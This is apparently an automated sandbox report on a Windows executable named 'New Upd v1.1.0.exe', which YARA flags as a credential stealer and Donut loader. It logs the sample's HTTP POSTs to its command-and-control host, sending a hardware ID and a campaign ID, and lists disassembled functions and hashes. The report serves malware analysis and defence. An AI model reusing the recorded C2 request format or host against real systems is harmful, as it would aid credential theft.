2024-12-27 22:21:24 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PMPBSEGZ713PIJG3D2D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1267 Host: begguinnerz.biz
2024-12-27 22:21:24 UTC	1267	OUT	Data Raw: 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 Data Ascii: --PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="pid"1--PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="lid"HpOoIh--3f
2024-12-27 22:21:25 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0uepi8bjsks92k8alfq1gpjvb; expires=Tue, 22 Apr 2025 16:08:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWNF%2FuwBLNYiPxAB5Al6VahG9kaOmgUBC%2BED6Iu5kQzu3RAD5iP9ZHtiSZTJgHUyoXaLcd0ihx9JXxl5BuOIWyWK2Ro4B4QpgYunA3wiSuTN7B6PctDAcLgC8gpbSV1Gv5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb415e9a07c84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1830&rtt_var=694&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2184&delivery_rate=1569048&cwnd=246&unsent_bytes=0&cid=331f128127cb7704&ts=775&x=0"
2024-12-27 22:21:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:21:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:26 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VSLUPTMYCJK38LQB5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1113 Host: begguinnerz.biz
2024-12-27 22:21:26 UTC	1113	OUT	Data Raw: 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 Data Ascii: --VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="pid"1--VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
2024-12-27 22:21:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=runnppf1gtfa6rsl0drsjc1vtp; expires=Tue, 22 Apr 2025 16:08:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQG9bHHoq5L9%2BMi8AUzfV13U7PXPiqKWXQq1ck4fVqRit70iubM%2FPFKBJjQv4CGBa%2F9JMU7BXIUpn7hNk%2FcmspLBVwMXY8krUCfPaWlluIJrUygAf7ztw9Ge2cnDUrGFi98%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb422ffb41835-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1498&rtt_var=569&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2028&delivery_rate=1909744&cwnd=139&unsent_bytes=0&cid=cf03c3a5b77ba1de&ts=1306&x=0"
2024-12-27 22:21:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:21:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:29 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: begguinnerz.biz
2024-12-27 22:21:29 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=A4F4F00761B3102BBEBA0C6A975F1733
2024-12-27 22:21:30 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sh3cvdmf6i2abcamvof68sm32o; expires=Tue, 22 Apr 2025 16:08:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5tlm3alTxJjydmnuAMmpZob7vWUFfhi09%2FrQyBJLW1AD7nMhYHcCfMOR%2F5CWenktswyTI99RJJYBOEprzyDR3aGKji8cI9rLmA7765TQgFFdwdOzLr6a1Y9w%2Fnp%2B9atwCc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb4342aaa8c83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1800&rtt_var=692&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1021&delivery_rate=1562332&cwnd=189&unsent_bytes=0&cid=83a50cf996b032fa&ts=773&x=0"
2024-12-27 22:21:30 UTC	54	IN	Data Raw: 33 30 0d 0a 2b 34 71 6c 43 77 4f 55 71 77 75 31 43 65 53 43 38 62 67 4a 36 36 39 55 47 55 70 62 62 43 59 41 70 35 71 62 72 59 50 52 61 31 69 67 31 77 3d 3d 0d 0a Data Ascii: 30+4qlCwOUqwu1CeSC8bgJ669UGUpbbCYAp5qbrYPRa1ig1w==
2024-12-27 22:21:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	17:20:59
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\New Upd v1.1.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\New Upd v1.1.0.exe"
Imagebase:	0x400000
File size:	2'510'896 bytes
MD5 hash:	3BDF3C4F1CFBB40A395EC5B10D97FAF3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.6%
Total number of Nodes:	722
Total number of Limit Nodes:	2

Executed Functions

Function 00815020 Relevance: 3.6, APIs: 2, Instructions: 648
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
__alldvrm.LIBCMT ref: 008157E8

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: FileView__alldvrm
String ID:
API String ID: 343586851-0
Opcode ID: 77e415023229af667a03df6b99b5f08fca11095f6f668ee05fa0a8911a9114cc
Instruction ID: 616af4c99068281474078e735244090946d9df6f3529accec9538e128f025c0d
Opcode Fuzzy Hash: 77e415023229af667a03df6b99b5f08fca11095f6f668ee05fa0a8911a9114cc
Instruction Fuzzy Hash: B5F156A7A55729469798BABE8C4F26E1503EBC0304787DB2EE953CB68BDD39854700C3

Function 00815213 Relevance: 3.5, APIs: 2, Instructions: 488
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
__alldvrm.LIBCMT ref: 008157E8

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: FileView__alldvrm
String ID:
API String ID: 343586851-0
Opcode ID: 54a5273e1f5c1ae0f98143e17f87397be45db9ea67c262969ff0b5ec56a9ff60
Instruction ID: add019ab978935c3fc721443b1597cdfb79fc9eac9d758b59eacd0a2402a6d63
Opcode Fuzzy Hash: 54a5273e1f5c1ae0f98143e17f87397be45db9ea67c262969ff0b5ec56a9ff60
Instruction Fuzzy Hash: 63C16AA7A11725469798BABE9C4F26E0503EBC0314787DB2EE953DB68BCE3D854700C3

Function 008154A5 Relevance: 3.3, APIs: 2, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
__alldvrm.LIBCMT ref: 008157E8

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: FileView__alldvrm
String ID:
API String ID: 343586851-0
Opcode ID: 64095076d116f429b95117a9449a55c2bd60d2bd6734c945c148c91b444f30ac
Instruction ID: 29662b03c1bdd92fbdd67ede21617af847a42f2ac4d7782440cec1d1fce8637d
Opcode Fuzzy Hash: 64095076d116f429b95117a9449a55c2bd60d2bd6734c945c148c91b444f30ac
Instruction Fuzzy Hash: EC717BA3E117654AE758B6BD9C4F2AE1542EBC0314B87CB2AE913DB64BDE39C54310C2

Function 00814D3A Relevance: 2.1, APIs: 1, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32(-00000001928BD631,-90EDDC5F,-04816628,?,-D679B2CA), ref: 00814EE3

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: bba3b4ba4193859ca897b99d4ae66c37582217ef22030655fb52ef607a8de40c
Instruction ID: 1cd86cbc4dd600a1f4cba5b2d8132b360de56d244602d0b79be037236c60ca6d
Opcode Fuzzy Hash: bba3b4ba4193859ca897b99d4ae66c37582217ef22030655fb52ef607a8de40c
Instruction Fuzzy Hash: 9DE1256796573846A69CBABE8C9F27E0503FBD03043D2A62DE983DB58BDD39844701C7

Non-executed Functions

Function 007F9170 Relevance: 25.7, APIs: 17, Instructions: 168
windowkeyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BeginPaint.USER32(?,?), ref: 007F91F2
CreateCompatibleDC.GDI32(?), ref: 007F91FF
SelectObject.GDI32(?,?), ref: 007F9213
SelectPalette.GDI32(?,?,00000000), ref: 007F9238
RealizePalette.GDI32(?), ref: 007F9245
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 007F926E
SelectPalette.GDI32(?,00000000,00000000), ref: 007F9284
SelectObject.GDI32(?,?), ref: 007F9292
DeleteDC.GDI32(?), ref: 007F929C
EndPaint.USER32(00000000,?), ref: 007F92AA
DeleteObject.GDI32(?), ref: 007F92DD
DeleteObject.GDI32(?), ref: 007F92FD
GetAsyncKeyState.USER32(00000100), ref: 007F9339

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: ObjectSelect$DeletePalette$Paint$AsyncBeginCompatibleCreateRealizeState
String ID:
API String ID: 1547880632-0
Opcode ID: a3c5115e678ea162abfd707b6b8fda01a5bd49db733d15370f78b5bfd95c4a57
Instruction ID: 5d85dac975c7164e0e883e22043c77f11606add29f111bcbc34c558c5d8d3673
Opcode Fuzzy Hash: a3c5115e678ea162abfd707b6b8fda01a5bd49db733d15370f78b5bfd95c4a57
Instruction Fuzzy Hash: FB613779A0420CEBDB14CFA4DC99BBE77B5BF88305F108909F71A9A390C7B89944DB51

Function 007FF400 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 007FF40E
_memset.LIBCMT ref: 007FF440
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 007FF45B
GetProcAddress.KERNEL32(00000000,PropertySheetA), ref: 007FF473

Strings

PropertySheetA, xrefs: 007FF46A
COMCTL32.DLL, xrefs: 007FF456
4, xrefs: 007FF448
4, xrefs: 007FF416

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: _memset$AddressLibraryLoadProc
String ID: 4$4$COMCTL32.DLL$PropertySheetA
API String ID: 3951463162-1160762502
Opcode ID: 0551e668e0fa2615ff3d5cf5645bba2ef984c77aa865fe237652032db87b443c
Instruction ID: 44799b7b43eed9122d1abaabe2ea833a3ae926560ab7604ef60ea11f4786617f
Opcode Fuzzy Hash: 0551e668e0fa2615ff3d5cf5645bba2ef984c77aa865fe237652032db87b443c
Instruction Fuzzy Hash: 0B011BB0D01308EBDB14EFE4E849BEDBB78BB04708F104128E615AB281DBB85648CF46

Function 0080735C Relevance: 10.7, Strings: 8, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

invalid bit length repeat, xrefs: 00807630, 008076B5
invalid distances set, xrefs: 008076FA
invalid code lengths set, xrefs: 00807483
invalid distance too far back, xrefs: 00807A5E
invalid literal/lengths set, xrefs: 00807681
too many length or distance symbols, xrefs: 008073D3
invalid distance code, xrefs: 008079E6
invalid literal/length code, xrefs: 00807892

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-3031085480
Opcode ID: 8240d85a1e4b4bcdcac9bebfde345d9fc86aaeb43c066a47f94f901a6f9d2ccd
Instruction ID: 84eb2c4d5ef9730ad3905dd7fa8a85ae6ef186d8eca7ae16227a08c9ad086ba9
Opcode Fuzzy Hash: 8240d85a1e4b4bcdcac9bebfde345d9fc86aaeb43c066a47f94f901a6f9d2ccd
Instruction Fuzzy Hash: EF528871E04A198FDB58CF68C8906ADBBF2FF84315F18446ED882D7790D774AA84DB50

Function 0080B245 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00811D1F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00811D34
UnhandledExceptionFilter.KERNEL32(00840A38), ref: 00811D3F
GetCurrentProcess.KERNEL32(C0000409), ref: 00811D5B
TerminateProcess.KERNEL32(00000000), ref: 00811D62

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 202151486e2c0bdf57f16bb4e20063e18f45fb08e5b5a72dd5ca99de6a671c5b
Instruction ID: 570db7a35d4f5945d24c6ac736c4470829afc8e176e228cf640d083baece1882
Opcode Fuzzy Hash: 202151486e2c0bdf57f16bb4e20063e18f45fb08e5b5a72dd5ca99de6a671c5b
Instruction Fuzzy Hash: C821BEB89083059FC755DF28FDC8A983BA8FB4A314F50585AE948973B0EBB85984CF45

Function 00E37E21 Relevance: 6.8, Strings: 5, Instructions: 571COMMON

Download Yara Rule

Strings

C:\U, xrefs: 00E3801B
C:\P, xrefs: 00E381D7
x86, xrefs: 00E3822E
x86, xrefs: 00E37F36
C:\P, xrefs: 00E3815B

Memory Dump Source

Source File: 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_e37000_New Upd v1.jbxd

Similarity

API ID:
String ID: C:\P$C:\P$C:\U$x86$x86
API String ID: 0-63958657
Opcode ID: c8ddd11d5a5529db87c121562458914e1fe71ae6a35a246c196f30eb88e6d3f1
Instruction ID: 073d82bbc20f02e170c28eb9b0077defc4bc8bfabe17c3ceb1f6804a8c872cd3
Opcode Fuzzy Hash: c8ddd11d5a5529db87c121562458914e1fe71ae6a35a246c196f30eb88e6d3f1
Instruction Fuzzy Hash: 4D12779244E7C01FD72B83704D6D962BF75AE63208B0E96CFD4C69F4E3D659980AC362

Function 00801000 Relevance: 6.1, APIs: 4, Instructions: 136timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00801062
